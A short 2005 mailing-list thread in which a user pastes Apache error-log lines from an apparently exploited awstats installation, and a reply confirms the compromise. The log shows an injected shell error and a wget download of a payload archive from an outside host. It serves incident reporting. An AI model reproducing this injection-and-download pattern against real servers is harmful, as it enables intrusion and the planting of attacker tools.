On Thu, Feb 24, 2005 at 10:16:33AM +0100, Markus Gerke wrote:
Hi, I installed awstats myself and therefore did not recognize that it is vulnerable (via the YOU run). I'm afraid this night someone exploited this vulnerability. I found this log in my error_log ... [Thu Feb 24 02:00:44 2005] [error] [client 213.186.57.179] script not found or unable to stat: /usr/local/httpd/cgi-bin/awstats.pl sh: line 1: /awstats.ipi207.ipi.uni-hannover.de.conf: No such file or directory --02:05:09-- http://sm3naru.net/n.tgz => `n.tgz' Resolving sm3naru.net... done. Connecting to sm3naru.net[217.160.226.79]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 83,851 [text/plain]
0K .......... .......... .......... .......... .......... 61% 134.77 KB/s 50K .......... .......... .......... . 100% 10.38 MB/s
02:05:09 (218.95 KB/s) - `n.tgz' saved [83851/83851] ...
n.tgz contains some icq-server scripts
Can someone confirm that this is a exploitation of the awstats-error??? Why it is logged in the apache error-log?
It is an exploitation. The error log probably logs all stderr output. Ciao, Marcus